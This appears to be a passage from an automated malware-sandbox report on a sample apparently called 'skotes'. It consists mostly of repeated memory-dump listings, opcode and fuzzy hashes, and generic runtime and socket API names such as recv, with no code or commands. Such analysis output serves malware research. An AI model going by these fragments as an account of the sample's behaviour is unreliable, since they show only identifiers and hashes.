                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea
                                                          • String ID: s|-I
                                                          • API String ID: 240046367-705684097
                                                          • Opcode ID: eb51d2a36b315f5638cad64750260ba1ba996d4d093d787042ab4186b6e1ee82
                                                          • Instruction ID: d18019e8be1b72741bdbbae89efe9039686aabb27a821676d7ded2342c1c4bcf
                                                          • Opcode Fuzzy Hash: eb51d2a36b315f5638cad64750260ba1ba996d4d093d787042ab4186b6e1ee82
                                                          • Instruction Fuzzy Hash: 26511572600226AFEB299F64EC41FFB3BA9DF85750F150229FD14E7540EB70DD50AAA0
                                                          APIs
                                                          • __Mtx_destroy_in_situ.LIBCPMT ref: 00BE3B93
                                                          • __Cnd_destroy_in_situ.LIBCPMT ref: 00BE3B99
                                                          • __Mtx_destroy_in_situ.LIBCPMT ref: 00BE3BA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                          • String ID: s|-I
                                                          • API String ID: 3308344742-705684097
                                                          • Opcode ID: 0f3d3d4c544f74d732881274baa82b53ac0c7a33e08430e1995c6f401169fb22
                                                          • Instruction ID: 9cb5876d35816656abdd4713e0f93b929b95342604de7ebf1b0b36140ef8c723
                                                          • Opcode Fuzzy Hash: 0f3d3d4c544f74d732881274baa82b53ac0c7a33e08430e1995c6f401169fb22
                                                          • Instruction Fuzzy Hash: 6651C3716007449FDB24DF29C889B6AB7E4EF05B20F148AADE557C7790DB38A904CB90
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _xtime_get$Xtime_diff_to_millis2
                                                          • String ID: s|-I
                                                          • API String ID: 2858396081-705684097
                                                          • Opcode ID: 98cb4ae50a5835603f0e7e4c1599e5a05494450de294878fa809bb294f8bc957
                                                          • Instruction ID: b8d95989307320c33b62d7d12a331a0852bf67f1fda4c54f7cc87c6eef1a5997
                                                          • Opcode Fuzzy Hash: 98cb4ae50a5835603f0e7e4c1599e5a05494450de294878fa809bb294f8bc957
                                                          • Instruction Fuzzy Hash: 49513F71A0011ECBCF24DF24C6D69B9BBE4EF14710B2448DAEA069B255D731FD89CBA4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Mtx_unlock$Cnd_broadcast
                                                          • String ID: s|-I
                                                          • API String ID: 32384418-705684097
                                                          • Opcode ID: 6aedae27630d77a072a2ae7e543d85edcf21c2f8aade0bc994a21d392cafaea3
                                                          • Instruction ID: 02131029f8ce03986904273ef7244d15669f7f5f87a4ef10ea002b61d231865b
                                                          • Opcode Fuzzy Hash: 6aedae27630d77a072a2ae7e543d85edcf21c2f8aade0bc994a21d392cafaea3
                                                          • Instruction Fuzzy Hash: 10414C71A04648EBCB10DB5ADD09BAFB7F8EF55B20F0041BAE905D3641EB749A08C6A1
                                                          APIs
                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 00BEE10B
                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 00BEE140
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: recv
                                                          • String ID: s|-I
                                                          • API String ID: 1507349165-705684097
                                                          • Opcode ID: e2fe41284380f1201c57f4596e9abf5d063b4fbcbadd26b54dfd6b8b2a1b45aa
                                                          • Instruction ID: dd7f155dcafa8d0f457961bea9322148ee0bce17895b029cafbbdd8f52e913c6
                                                          • Opcode Fuzzy Hash: e2fe41284380f1201c57f4596e9abf5d063b4fbcbadd26b54dfd6b8b2a1b45aa
                                                          • Instruction Fuzzy Hash: F731C9B19002885BDB10CBA9DC41BAF7BF8FB09734F100665E525E72D1D775E8488B60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
